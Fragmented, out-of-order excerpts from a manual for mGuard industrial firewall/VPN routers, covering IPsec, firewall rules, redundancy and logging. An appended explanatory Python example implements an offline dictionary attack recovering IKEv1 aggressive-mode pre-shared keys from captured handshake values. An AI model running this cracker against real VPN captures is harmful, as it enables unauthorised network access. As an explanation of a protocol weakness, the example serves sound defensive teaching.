198. e fault gateway if you want to use VPN connections (see Page 115). Alternatively, you can select a different stealth configuration than the multiple clients configuration, or use another network mode. In order to successfully establish an IPsec connection, the VPN partner must support IPsec with the following configuration: authentication via pre-shared key (PSK) or X.509 certificates; ESP; Diffie-Hellman group 2 or 5; DES, 3DES or AES encryption; MD5, SHA-1 or SHA-2 hash algorithms; tunnel or transport mode; Quick mode; Main mode; SA lifetime 1 second to 24 hours. If the partner is a computer running Windows 2000, the Microsoft Windows 2000 High Encryption Pack or at least Service Pack 2 must be installed. If the partner is positioned downstream of a NAT router, the partner must support NAT-T. Alternatively, the NAT router must know the IPsec protocol (IPsec/VPN passthrough). For technical reasons, only IPsec tunnel connections are supported in both cases. Example. IPsec VPN menu. 10.2.1 Connections: Lists all the VPN connections that have been defined. Each connection name listed here can refer to an individual VPN connection or a group of VPN connection channels. You have the option of defining several tunnels under the transport and/or tunnel settings of the relevant entry. You also have the option of defining new VPN connections, activating and deactivat
199. e mGuard should adopt in order to authenticate the partner (browser of the remote user). The remote certificate can be selected from the selection list. The selection list contains the remote certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item. root / admin / netadmin / audit / user: Specifies which user or administrator rights are granted to the remote user. For a description of the root, admin and user authorization levels, see Authentication >> Administrative Users on page 181. The netadmin and audit authorization levels relate to access rights with the mGuard device manager. Management menu. 4.3 Management >> Licensing: You can obtain additional optional licenses from your authorized mGuard dealer. 4.3.1 Overview. (Screenshot: Management >> Licensing, tabs Overview / Install / Terms of License; mGuard Flash ID: U3DDD33F38 0B67 1A85 8E4B 0274BDA00853 0568; columns Feature / License / License with priority; license shown: 1279215535, licence_id 0, licence_date 2010 07 15117 38 55, flash_id U3DDD33F8 0B67 1A85 8E4B 027ABDA00853, serial_number 1A715030, hardware_revision 00002001, product_code BD 970010, pxc_product_code BD 970010.) With mGuard Version 5.0 or later, licenses remain installed even after the firmware is flashed. However, licenses are still deleted when devices with older firmware versions are flashed to Version 5.0.0 or later. Before flashing, the license for usin
200. e the mGuard devices support forwarding of special UDP/TCP ports from a virtual IP address to other IP addresses, provided the other IP addresses can be reached by the mGuard. In addition, the mGuard also masks data with virtual IP addresses when masquerading rules are set up. State monitoring: State monitoring is used to determine whether the mGuard is active, on standby or has an error. Each mGuard determines its own state independently based on the information provided by other components. State monitoring ensures that two mGuard devices are not active at the same time. Status indicator: The status indicator contains detailed information on the firewall redundancy state. A summary of the state can be called up using the Redundancy >> Firewall Redundancy >> Redundancy or Redundancy >> Firewall Redundancy >> Connectivity Checks menus. 16.1.2 Interaction of the firewall redundancy components: During operation, the components work together as follows: both mGuard devices perform ongoing connectivity checks for both of their network interfaces (internal and external). In addition, an ongoing availability check is performed. Each mGuard listens continuously for presence notifications (CARP), and the active mGuard also sends them. Based on the information from the connectivity and availability checks, the state monitoring function is made aware of the
201. e 1:1 NAT address or the actual address. Outgoing: From IP: the 1:1 NAT address or the actual address; To IP: the IP address in the VPN tunnel. IPsec VPN >> Connections >> Edit >> Firewall. From Port / To Port: Only evaluated for TCP and UDP protocols. any refers to any port; startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3 or pop3 for 110). Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. (In Stealth mode, Reject has the same effect as Drop.) Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts. Comment: Freely selectable comment for this rule. Log: For each individual firewall rule, you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting). Log entries for unknown connection attempts: When set to Yes, all connection attempts that are not covered by the rules defined above are logged. Outgoing: The explanation provided under Incoming also applies to Outgoing.
202. e Certificate below. • Install the remote certificate under Remote Certificate (see Installing the remote certificate on page 271). It is not possible to reference a remote certificate loaded under the Authentication >> Certificates menu item. If the VPN partner authenticates itself with a machine certificate signed by a CA: It is possible to authenticate the machine certificate shown by the partner as follows: using CA certificates, or using the corresponding remote certificate. Authentication using a CA certificate: Only the CA certificate from the CA that signed the certificate shown by the VPN partner should be referenced here (selection from list). The additional CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner must be installed on the mGuard under the Authentication >> Certificates menu item. The selection list contains all CA certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item. The other option is Signed by any trusted CA. With this setting, all VPN partners are accepted, providing that they log in with a signed CA certificate issued by a recognized certification authority (CA). The CA is recognized if the relevant CA certificate and all other CA certificates have been loaded on the mGuard. These then form the chain to the root certificate together with the certificates shown
203. e LAN port, the WAN port is also disabled/enabled. External: if the connection is lost/established on the WAN port, the LAN port is also disabled/enabled. Logging menu. 14 Logging menu. Logging >> Settings >> Remote Logging. Logging refers to the recording of event messages, e.g. regarding settings that have been made, the application of firewall rules, errors, etc. Log entries are recorded in various categories and can be sorted and displayed according to these categories (see Logging >> Browse local logs on page 323). 14.1 Logging >> Settings. 14.1.1 Settings: All log entries are recorded in the RAM of the mGuard by default. Once the maximum memory space for log entries has been used up, the oldest log entries are automatically overwritten by new entries. In addition, all log entries are deleted when the mGuard is switched off. To prevent this, log entries (SysLog messages) can be transmitted to an external computer (SysLog server). This is particularly useful if you wish to manage the logs of multiple mGuard devices centrally. (Screenshot: Logging >> Settings, tabs Settings / Remote Logging; Activate remote UDP logging: No; Log Server IP address: 192.168.1.254; Log Server port (normally 514): 514; Verbose Logging: Verbose modem logging: No; Verbose mobile network logging: No.) Activate remote UDP logging (Yes / No): If you want all log ent
204. e are required for each session. The root user has unrestricted access. In the case of administrative access via another user (admin, netadmin and audit), the number of simultaneous sessions is restricted. You can specify the number here. The netadmin and audit authorization levels relate to access rights with the mGuard device manager. The restriction does not affect existing sessions; it only affects newly established access instances. Maximum number of concurrent sessions for role admin: 2 to 2147483647. At least two simultaneously permitted sessions are required for admin to prevent it from having its access blocked. Maximum number of concurrent sessions for role netadmin: 0 to 2147483647. When 0 is set, no session is permitted. The netadmin user is not necessarily used. Maximum number of concurrent sessions for role audit: 0 to 2147483647. When 0 is set, no session is permitted. The audit user is not necessarily used. (Screenshot: Allowed Networks; row 1: 10.1.0.0/16, External, Accept, Log No; row 2: 192.168.67.0/24, External, Accept, Log No.) Management >> System Settings >> Shell Access: Lists the firewall rules that have been set up. These apply for incoming data packets of an SSH remote access attempt. If multiple firewall rules are defined, these are queried starting from the top
205. e chosen. • A name must be assigned, whether it is the suggested one or another. Names must be unique and must not be assigned more than once. Using the short name: During the configuration of SSH (Management >> System Settings, Shell Access menu) and HTTPS (Management >> Web Settings, Access menu), the certificates imported on the mGuard are provided in a selection list. The certificates are displayed under the short name specified for each certificate in this selection list. Name assignment is mandatory. Creating a certificate copy: A copy can be created from the imported remote certificate. To do this, proceed as follows: • Click on Current Certificate File next to the Download Certificate row for the relevant remote certificate. A dialog box opens in which you can enter the required information. Authentication menu. 7.4.5 CRL. (Screenshot: Authentication >> Certificates, tabs Certificate settings / Machine Certificates / CA Certificates / Remote Certificates / CRL; CRL table columns: Issuer, Last Update, Next Update, URL, Download via VPN if applicable (No), Upload.) Authentication >> Certificates >> CRL: CRL stands for certificate revocation list. The CRL is a list containing serial numbers of blocked certificates. This page is used for the configuration of sites from which the mGuard should download
206. e is filled and updated constantly by the forwarded network packets. It is protected against unauthorized access. The data is transmitted through the physical LAN interface and never through the virtual network interface. To keep internal data traffic to a minimum, a VLAN can be configured to store the synchronization data in a separate multicast and broadcast domain. Virtual IP addresses: Each mGuard is configured with virtual IP addresses. The number of virtual IP addresses depends on the network mode used. Both mGuard devices in a redundant pair must be assigned the same virtual IP addresses. The virtual IP addresses are required by the mGuard to establish virtual network interfaces. Two virtual IP addresses are required in Router network mode, while others can be created. One virtual IP address is required for the external network interface and the other for the internal network interface. These IP addresses are used as a gateway for routing devices located in the external or internal LAN. In this way, the devices can benefit from the high availability resulting from the use of both redundant mGuard devices. The redundant pair automatically defines MAC addresses for the virtual network interface. These MAC addresses are identical for the redundant pair. In Router network mode, both mGuard devices share a MAC address for the virtual network interface connected to the external and internal Ethernet segment. In Router network mod
207. e notifications (CARP), but shorter than the upper limit of the fail-over switching time. Loss of presence notifications (CARP) during transmission: A one-off loss of presence notifications (CARP) is tolerated by the mGuard, but it does not tolerate the loss of subsequent presence notifications (CARP). This applies to the availability check on each individual network interface, even when these are checked simultaneously. It is therefore very unlikely that the availability check will fail as a result of a very brief network interruption. Loss of ICMP echo requests/replies during transmission: ICMP echo requests or replies are important for the connectivity check. Losses are always observed, but are tolerated under certain circumstances. The following measures can be used to increase the tolerance level on ICMP echo requests: Select "at least one target must respond" under Kind of check in the Redundancy >> Firewall Redundancy >> Connectivity Checks menu. Also define a secondary set of targets here. The tolerance level for the loss of ICMP echo requests can be further increased by entering the targets of unreliable connections under both sets (primary and secondary) or listing them several times within a set. Restoring the primary mGuard following a failure: If a redundant pair is defined with different priorities, the secondary mGuard becomes active if
208. e of the egress queue to which traffic should be assigned. Comment: Optional comment text. Redundancy menu. 13 Redundancy menu. Redundancy is described in detail in Section 16, Redundancy. To use the redundancy function, both mGuards must have the same firmware. 13.1 Redundancy >> Firewall Redundancy: This menu is not available on the mGuard rs2000 and mGuard rs2000 3G. 13.1.1 Redundancy. (Screenshot: Redundancy >> Firewall Redundancy >> Redundancy, General; Redundancy state: faulty (The mGuard does not yet have proper connectivity or cannot determine it for sure); Enable redundancy: Yes; Fail-over switching time: 3 second(s); Latency before fail-over: 0 milliseconds; Priority of this device: high; Passphrase for availability checks: passwd; Virtual interface: Virtual router ID 51, Enable virtual IP: No, 10.0.0.100; Management IP addresses of 2nd device: 10.0.0.1; Encrypted state synchronisation: Encrypt the state messages: Yes, Passphrase: 10onG paSsWord with Much 3n trpoy, Encryption Algorithm: 3DES, Hash Algorithm: SHA-1.) Redundancy >> Firewall Redundancy >> Redundancy, General: Redundancy state; Enable redundancy; Fail-over switching time; Waiting time prior to switching; Priority of this device. Shows the current sta
209. econfigured individually, it may be the case that the mGuard on standby has an obsolete machine certificate for a brief period. If the mGuard on standby becomes active at the exact moment when the ISAKMP SAs are being established, this procedure cannot be continued with an obsolete machine certificate. As a countermeasure, VPN state synchronization replicates the machine certificate from the active mGuard to the mGuard on standby. In the event of a fail-over, the mGuard on standby will only use this to complete the process of establishing the ISAKMP SAs where this has already been started. If the mGuard on standby establishes new ISAKMP SAs after a fail-over, it uses the machine certificate that has already been configured. VPN state synchronization therefore ensures that the currently used machine certificates are replicated. However, it does not replicate the configuration itself. The mGuard on standby has an obsolete Pre-Shared Key (PSK): Pre-Shared Keys (PSK) also need to be renewed on occasion in order to authenticate VPN partners. The redundant mGuard devices may then have a different PSK for a brief period. In this case, only one of the mGuard devices can establish a VPN connection, as most VPN partners only accept one PSK. The mGuard does not offer any countermeasures for this. We therefore recommend using X.509 certificates instead of PSKs. If VPN state synchronization replicat
210. ed as the default queue in this selection list. The assignment of specific data traffic to an egress queue is based on a list of criteria. If the criteria in a row apply to a data packet, it is assigned to the egress queue specified in the row. Example: for audio data to be transmitted, you have defined a queue with guaranteed bandwidth and priority under Egress Queues (see Page 296) under the name Urgent. You then define the rules here for how audio data is detected and specify that this data should belong to the Urgent queue. Protocol (All, TCP, UDP, ICMP, ESP): Protocol(s) relating to the rule. From IP: IP address of the network or device from which the data originates. 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Assign the traffic from this source to the queue selected under Queue Name in this row. From Port: Port used at the source from which data originates (only evaluated for TCP and UDP protocols). any refers to any port; startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3 or pop3 for 110). To IP: IP address of the network or device to which the data is sent. Entries correspond to From IP as described above. To Port: Port used at the source where the data is sent. Entries correspond to From Port as described above.
211. ed interface. An ICMP echo reply cannot be received by an external interface when the target is connected to the internal interface, and vice versa. When the static routes are changed, it is easy to forget to adjust the configuration of the targets accordingly. The targets for the connectivity check should be well thought out. Without a connectivity check, all it takes are two errors for a network lobotomy to occur. A network lobotomy is prevented if the targets for both mGuard devices are identical and all targets have to answer the request. However, the disadvantage of this method is that the connectivity check fails more often if one of the targets does not offer high availability. In Router network mode, we recommend defining a highly available device as the target on the external interface. This can be the default gateway for the redundant pair, e.g. a virtual router comprised of two independent devices. In this case, either no targets or a selection of targets should be defined on the internal interface. Please also note the following information when using a virtual router consisting of two independent devices as the default gateway for a redundant pair: If these devices use VRRP to synchronize their virtual IP, then a network lobotomy could split the virtual IP of this router into two identical copies. These routers could use a dynamic routing protocol, and only one may be selected for the data flows of the network being monitored
212. ed to check whether a file has been changed. SHA-256 is more secure than SHA-1, but it takes longer to process. CIFS Integrity Monitoring menu. CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Checked Share. To be stored on CIFS share / Basename of the checksum files (may be prefixed with a directory): In order to perform the check, the mGuard must be provided with a network drive for storing the files. The checksum memory can be accessed via the external network interface. The same network drive can be used as the checksum memory for several different drives to be checked. The base name of the checksum files must then be clearly selected in this case. The mGuard recognizes which version the checksum files on the network drive must have. For example, if it is necessary to restore the contents of the network drive from a backup following a malfunction, old checksum files are provided in this case and the mGuard would detect the deviations. In this case, the integrity database must be recreated (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Management, Possible Actions). The checksum files are stored on the network drive specified above. They can also be stored in a separate directory. The directory name must not start with a backslash. Example: Checks
213. ed to set up a connection to the required partner, which could be any site on the Internet. Every host or router on the Internet/Intranet has its own unique IP address (IP = Internet Protocol). An IP address is 32 bits (4 bytes) long and is written as four numbers, each between 0 and 255, which are separated by a dot. An IP address consists of two parts: the network address and the host address. All network hosts have the same network address but different host addresses. The two parts of the address differ in length depending on the size of the respective network (networks are categorized as Class A, B or C): Class A: 1st byte network address, 2nd to 4th byte host address; Class B: 1st and 2nd byte network address, 3rd and 4th byte host address; Class C: 1st to 3rd byte network address, 4th byte host address. (Glossary entries: IPsec; Subject certificate.) The first byte of the IP address determines whether the IP address of a network device belongs to Class A, B or C. The following is specified (value of byte 1 / bytes for the network address / bytes for the host address): Class A: 1-126 / 1 / 3; Class B: 128-191 / 2 / 2; Class C: 192-223 / 3 / 1. Based on the above figures, the number of Class A networks worldwide is limited to 126. Each of these networks can have a maximum of 256 x 256 x 256 hosts (3 bytes of address area). There can be 64 x 256 Class B networks, and each of these networks can have up to 65,536 hosts
214. ... 334
16.1.5 Fail-over switching time 335
16.1.6 Error compensation through firewall redundancy 337
16.1.7 Handling firewall redundancy in extreme situations 338
16.1.8 Interaction with other devices 340
16.1.9 Transmission capacity with firewall redundancy 343
16.1.10 Limits of firewall redundancy 344
16.2 VPN redundancy 345
16.2.1 Components in VPN redundancy 345
16.2.2 Interaction of the VPN redundancy component 346
16.2.3 Error compensation through VPN redundancy 346
16.2.4 Setting the variables for VPN redundancy 347
16.2.5 Requirements for VPN redundancy 348
16.2.6 Handling VPN redundancy in extreme situations 348
16.2.7 Interaction with other devices 350
16.2.8 Transmission capacity with VPN redundancy 352
16.2.9 Limits of VPN redundancy 353
MZ CO
215. efault firewall settings: All incoming connections are rejected (excluding VPN). Data packets of all outgoing connections are allowed through. The firewall rules here have an effect on the firewall that is permanently active, with the exception of VPN connections. Individual firewall rules are defined for VPN connections (see IPsec VPN >> Connections on page 254, Firewall on page 276). User firewall: When a user logs in for whom user firewall rules are defined, these rules take priority (see Network Security >> User Firewall on page 225), followed by the permanently active firewall rules. If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored. 8.1.1 Incoming rules. (Screenshot: Network Security >> Packet Filter, tabs Incoming Rules / Outgoing Rules / DMZ / Rule Records / MAC Filtering / Advanced; Incoming: General firewall setting: Use the firewall ruleset below / Accept all incoming connections / Drop all incoming connections; Log ID: fw-incoming-3391ddd8-f26e-1a20-a50e-000cbe00052e; rule row 1: Interface External, Protocol TCP, From IP 0.0.0.0/0, To Port any, Action Accept, Log Yes; row 2: External2 T
216. emote access. Remote SEC Stick TCP Port. Delay between requests for a sign of life (the value 0 indicates that these messages will not be sent). Maximum number of missing signs of life. Allow SEC Stick forwarding into VPN tunnel. Concurrent Session Limits: Maximum number of cumulative concurrent sessions for all users; Maximum number of concurrent sessions for one user: 2. Allowed Networks: Log ID fw-secstick-access-00000000-0000-0000-0000-000000000000; rule row: From IP 0.0.0.0/0, Interface External, Action Accept, Log No. These rules allow to enable SEC Stick remote access. Note: In Stealth mode, incoming traffic on the given port is no longer forwarded to the client. Note: In router mode with NAT or port forwarding, the port set here has priority over port forwarding. Note: The SEC Stick access from the internal side and via dial-in is enabled by default and can be restricted by firewall rules. SEC Stick >> Global >> Access. SEC Stick Access: Access via the SEC Stick requires a license. This access function can only be used if the corresponding license has been purchased and installed in the scope of functions for the mGuard rs2000 3G, mGuard rs2000. Enable SEC Stick service: Set this option to Yes to specify that the SEC Stick being used at a remote location (or its owner) is able to log in. In this case, SEC Stick remote access must also be enabled (next option). Enab
217. ...temporarily as a secondary external interface. It supports dedicated routes and DNS configuration. Network >> Interfaces >> General, Stealth network mode, Secondary External Interface, Operation Mode (permanent / temporary): After selecting Modem or Built-in Modem network mode for the secondary external interface, the operating mode of the secondary external interface must be specified. [Screenshot: Network Mode: Built-in mobile network modem; Operation Mode: permanent; Secondary External Routes: 192.168.3.0/24 via gateway.] permanent: Data packets whose destination corresponds to the routing settings specified for the secondary external interface are always routed via this external interface. The secondary external interface is always activated. temporary: Data packets whose destination corresponds to the routing settings specified for the secondary external interface are only routed via this external interface when additional, separately defined conditions are met. Only then is the secondary external interface activated and the routing settings for the secondary external interface take effect (see Probes for activation on page 120). Secondary External Routes, Network: Specify the routing to the external network here. Multiple routes can be specified. Data packets intended for these networks a
218. ...between two computers and use them simultaneously. Certain port numbers are reserved for specific purposes: for example, HTTP connections are usually assigned to TCP port 80 and POP3 connections to TCP port 110. Proxy: A proxy is an intermediary service. A web proxy (e.g. Squid) is often connected upstream of a large network. For example, if 100 employees frequently access a certain website over a web proxy, the proxy only loads the relevant web pages from the server once and then distributes them as needed among the employees. Remote web traffic is reduced, which saves money. Glossary entries on this page: PPPoE, PPTP, Router, Trap, X.509 certificate. PPPoE: Acronym for Point-to-Point Protocol over Ethernet, a protocol based on the PPP and Ethernet standards. PPPoE is a specification defining how to connect users to the Internet via Ethernet using a shared broadband medium such as DSL, wireless LAN or a cable modem. PPTP: Acronym for Point-to-Point Tunneling Protocol. This protocol was developed by Microsoft and U.S. Robotics, among others, for data transfer between two VPN nodes (VPN via a public network). Note that PPTP's usual authentication (MS-CHAPv2) and its MPPE encryption are now considered broken; where confidentiality matters, prefer IPsec. Router: A router is a device that is connected to different IP networks and communicates between them. To do this, the router has an interface for each network connected to it. A router must find the correct path to the destination for incoming data and define the appropriate interface for forwarding
219. mGuard basics. 1.2.3 DMZ: A DMZ (demilitarized zone) is a protected network that is located between two other networks. For example, a company's website may be in the DMZ so that new pages can only be copied to the server from the intranet using FTP (note that plain FTP carries credentials in cleartext; use SFTP or FTPS in practice); however, the pages can be read from the Internet via HTTP. IP addresses within the DMZ can be public or private, and the mGuard, which is connected to the Internet, forwards the connections to private addresses within the DMZ by means of port forwarding. A DMZ scenario can be established either between two mGuards (see Figure 1.3) or via a dedicated DMZ port of the mGuard rs4000 3G. [Figure 1.3: DMZ] 1.2.4 VPN gateway: The VPN gateway provides company employees with encrypted access to the company network from home or when traveling. mGuard performs the role of the VPN gateway. IPsec-capable VPN client software must be installed on the external computers or, failing that, the computer is equipped with an mGuard. [Figure 1.4: VPN gateway]
220. ...intensive. Therefore the active mGuard may have an obsolete IPsec replay window following a fail-over. This means that a replay attack is possible for a brief period, until the real VPN partner has sent the next ESP packet for the corresponding IPsec SA or until the IPsec SA has been renewed. However, the attacker must have captured the traffic completely for this to occur. Dead Peer Detection: Please note the following point for Dead Peer Detection. With Dead Peer Detection, set a higher timeout than the upper limit for the fail-over switching time on the redundant pair (see IPsec VPN >> Connections >> Edit >> IKE Options, Delay between requests for a sign of life). Otherwise the VPN partners may conclude that the redundant pair is dead even though it is only dealing with a fail-over. Data traffic: In the event of high latency in the network used for state synchronization updates, the mGuard on standby is assigned the outdated state. The same thing also happens in the event of serious data loss on this network. This does not occur, however, as long as no more than two back-to-back updates are lost, because the mGuard on standby automatically requests a repeat of the update. The latency requirements are the same as those detailed under Fail-over switching time on page 335. Actual IP addresses: VPN partners may not send ESP traffic to the
221. ...client has been determined. If no Stealth Management IP Address or Client's MAC address is configured in static Stealth mode, then DAD (duplicate address detection) ARP requests are sent via the internal interface (see RFC 2131, Dynamic Host Configuration Protocol, Section 4.4.1). Secondary External Interface: Only in Router network mode (with Static or DHCP router mode) or Stealth network mode. Only for mGuard rs4000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard. In these network modes the serial interface of the mGuard can be configured as an additional secondary external interface. mGuard rs4000 3G: only in Router network mode with Static or DHCP router mode, the built-in mobile network modem of the mGuard can be configured as an additional secondary external interface. The secondary external interface can be used to transfer data traffic permanently or temporarily to the external network (WAN). If the secondary external interface is activated, the following applies. Network >> Interfaces >> General, Stealth network mode: In Stealth network mode, only the data traffic generated by the mGuard is subject to the routing specified for the secondary external interface, not the data traffic from a locally connected computer. Locally connected computers cannot be accessed remotely either; only the mGuard itself can be accessed remotely if the c
222. ...event of a network lobotomy (see page 338). After a fail-over, semi-unidirectional or complex connections that were established in the second before the fail-over may be interrupted (see Fail-over when establishing complex connections on page 338 and Fail-over when establishing semi-unidirectional connections on page 338). Firewall redundancy does not support the mGuard pci in Driver mode. State synchronization does not replicate the connection tracking entries for ICMP echo requests forwarded by the mGuard. Therefore ICMP echo replies can be dropped according to the firewall rules if they only reach the mGuard after the fail-over is completed. For the same reason, ICMP echo replies are not suitable for measuring the fail-over switching time. Masquerading involves hiding the transmitter behind the first virtual IP address or the first internal IP address. This is different from masquerading on the mGuard without firewall redundancy: when firewall redundancy is not activated, the external or internal IP address hiding the transmitter is specified in a routing table. 16.2 VPN redundancy: VPN redundancy can only be used together with firewall redundancy. The concept is the same as for firewall redundancy. In order to detect an error in the system environment, the activity is transmitted from the active mGuard to the mGuard on standby. At any given point in time, at least one mGuard in the redundant pair i
223. ...identification purposes. The mGuard will not establish a connection to the service provider if the ISP does not give the correct name. Password: password that must be specified during Internet service provider login to access the Internet. (Yes/No): the following two entry fields are shown when Yes is selected. Password that the mGuard requests from the server: the mGuard only allows the connection if the server returns the agreed password. Network >> Interfaces >> Dial-out, subsequent fields: If None is selected as the authentication method, see under "If None is selected as the authentication method" on page 133. In this case the fields that relate to the PAP or CHAP authentication methods are hidden; only the fields that define further settings remain visible below. [Screenshot: Authentication: None; Dial on demand: Yes; Idle timeout: Yes; Idle time: 300 seconds; Local IP 0.0.0.0; Remote IP 0.0.0.0; Netmask 0.0.0.0.] Other common settings. Network >> Interfaces >> Dial-out, PPP dial-out options, Dial on demand (Yes/No): Whether Yes or No, the telephone connection is always established by the mGuard. If set to Yes (default), this setting is useful for telephone connections where costs are calculated according to the connection time. The mGuard only commands the modem to establish a telephone connection when network
224. 12 QoS menu. This menu is not available on the mGuard rs2000 3G. QoS (Quality of Service) refers to the quality of individual transmission channels in IP networks. This relates to the allocation of specific resources to specific services or communication types so that they work correctly. The necessary bandwidth, for example, must be provided to transmit audio or video data in real time in order to reach a satisfactory communication level; at the same time, slower data transfer by FTP or e-mail does not threaten the overall success of the transmission process (file or e-mail transfer). 12.1 Ingress Filters: An ingress filter prevents the processing of certain data packets by filtering and dropping them before they enter the mGuard processing mechanism. The mGuard can use an ingress filter to avoid processing data packets that are not needed in the network. This results in faster processing of the remaining, i.e. required, data packets. Using suitable filter rules, for example, administrative access to the mGuard can be ensured with high probability. Packet processing on the mGuard is generally defined by the handling of individual data packets. This means that the processing performance depends on the number of packets to be processed and not on the bandwidth. Filtering is performed exclusively according to features that are present (or may be present) in each data packet: the sender and recipient IP address specified in the
225. Current Provider / Provider selection (status fields). Engine state: indicates the state of the mobile network engine. Engine is powered down: mobile network and positioning disabled (mobile network and GPS switched off). Engine is powered up: only positioning possible (mobile network disabled, GPS enabled). Mobile network connection for sending/receiving text messages and calls without packet data transmission: SIM card inserted, PIN correctly entered. Mobile network connection for sending/receiving text messages and calls with packet data transmission: SIM card inserted, PIN correctly entered, Router network mode or secondary router mode set to Built-in mobile network modem, APN correctly entered, PPP authentication correctly stored. Signal strength: strength of the mobile network signal from 0 to 100 (corresponding to -113 dBm to -51 dBm). The optimum received power is 100 signal strength, i.e. -51 dBm. LAC: area code (location in the mobile phone network). CID: unique mobile phone cell ID. PLMN: provider. Mobile network standard (GSM, EDGE, UTRAN, HSUPA, HSDPA, CDMA): shows the current mobile network standard. Packet transmission: shows the current status of the packet transmission. Provider: name of the mobile network provider. Provider selection: No mobile networking (mobile network connection disabled); Generic GSM/UMTS Provider (mobile network connection via the SIM card provider); Verizon CDMA (US) (in the USA, mobile network connection without SIM card via the MEID code, which is prin
226. ...er that implements remote access may have to specify the port number defined here during login. Example: if this mGuard can be accessed over the Internet via address 123.124.125.21 and the default port number 22 has been specified for remote access, you may not need to enter this port number in the SSH client (e.g. PuTTY or OpenSSH) of the remote partner. If a different port number has been set, e.g. 2222, it must be specified, e.g. ssh -p 2222 123.124.125.21. A non-standard port is not an access control; the firewall rules for the SSH port and the strength of the credentials are. Delay between requests for a sign of life: default 120 seconds. Values from 0 to 3600 seconds can be set. Positive values indicate that the mGuard sends a query to the partner within the encrypted SSH connection to find out whether it can still be accessed. The request is sent if no activity was detected from the partner for the specified number of seconds (e.g. due to network traffic within the encrypted connection). The value entered relates to the functionality of the encrypted SSH connection. As long as the functions are working properly, the SSH connection is not terminated by the mGuard as a result of this setting, even when the user does not perform any actions during this time. Because the number of simultaneously open sessions is limited (see Concurrent Session Limits), it is important to terminate sessions that have expired. Therefore the request for a sign of life is preset to 120 seconds in the case of version 7.4.0 or later. If a maximum of three requests for a sign of life are issued
227. ...er with the Aggressive Mode (insecure) setting, all Diffie-Hellman algorithms should be selected under IKE Options for the responder of the connection. When using a fixed Diffie-Hellman algorithm, it must be the same for all connections using the Aggressive Mode (insecure) setting. IPsec VPN >> Connections >> Edit >> Authentication, ISAKMP Mode. Main Mode (secure): In main mode the party wishing to establish the connection (initiator) and the responder negotiate an ISAKMP SA. We recommend using certificates in main mode. Aggressive Mode (insecure): Aggressive mode is less secure than main mode. The identities are exchanged before encryption is established, and with pre-shared keys the responder's authentication hash is sent in the clear, so a passive observer can run an offline dictionary attack against the PSK. The use of this mode can be justified if the responder does not know the initiator's address in advance and both parties wish to use pre-shared keys for authentication. Another reason may be the wish for faster connection establishment if the peers are sufficiently known to the responder, e.g. an employee wishing to access the company network. Requirement: cannot be used together with the redundancy function. The same mode must be used between peers. If two VPN clients downstream of the same NAT gateway establish the same connection to a VPN gateway, they must use the same PSK. As an alternative, the VPN gateway must provide each client with a different VPN identifier for the pa
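Why the manual labels aggressive mode with pre-shared keys insecure, as an added example that is not part of the mGuard documentation or firmware: in IKEv1 aggressive mode the responder's HASH_R is sent unencrypted in message 2, and every other input to it (nonces, DH public values, cookies, the SA payload and the responder identity) is also visible on the wire. The derivation below follows RFC 2409 (SKEYID for PSK authentication and HASH_R) with HMAC-SHA1 as the prf; the "captured" exchange values are random placeholders standing in for a real capture, the responder identity and the wordlist are constructed, and no gateway is contacted. In main mode the same hash travels inside the already-encrypted fifth and sixth messages, and with certificates there is no PSK to recover at all; a long random PSK defeats the dictionary attack but not the identity leak.

```python
"""Offline dictionary attack against an IKEv1 aggressive-mode PSK (RFC 2409).
Added example, not mGuard code. Exchange values are random placeholders for a
capture; the wordlist and responder identity are constructed."""
import hashlib
import hmac
import os
from typing import Optional


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b), RFC 2409 section 5.4."""
    return hmac.new(psk, ni + nr, hashlib.sha1).digest()


def hash_r(psk: bytes, obs: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    sk = skeyid_psk(psk, obs["ni"], obs["nr"])
    data = (obs["gxr"] + obs["gxi"] + obs["cky_r"] + obs["cky_i"]
            + obs["sai_b"] + obs["idir_b"])
    return hmac.new(sk, data, hashlib.sha1).digest()


def capture_aggressive_mode(psk: bytes, responder_id: bytes) -> dict:
    """Stand-in for what a sniffer sees in the first two aggressive-mode
    messages. Real DH public values are 1024+ bits; random bytes are used
    because only their presence in the hash input matters here."""
    obs = {
        "ni": os.urandom(16), "nr": os.urandom(16),
        "gxi": os.urandom(128), "gxr": os.urandom(128),
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),
        "sai_b": b"\x00\x00\x00\x28" + os.urandom(36),   # SA payload body, constructed
        "idir_b": responder_id,
    }
    obs["hash_r"] = hash_r(psk, obs)   # transmitted in the clear in message 2
    return obs


def crack_psk(obs: dict, wordlist) -> Optional[bytes]:
    """Recompute HASH_R for each candidate; purely offline, no gateway interaction."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, obs), obs["hash_r"]):
            return candidate
    return None


# Constructed wordlist; a real attacker would use rule-based candidate generation.
WORDLIST = [b"password", b"vpn", b"company123", b"Plant-Zone-7", b"industrial42"]

if __name__ == "__main__":
    captured = capture_aggressive_mode(b"industrial42", b"vpn.example.net")
    print("recovered PSK:", crack_psk(captured, WORDLIST))
```

The check a practitioner should draw from this: any aggressive-mode PSK in use today must be long and random, the responder's identity should be treated as public, and the manual's recommendation of certificates in main mode is the real fix.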
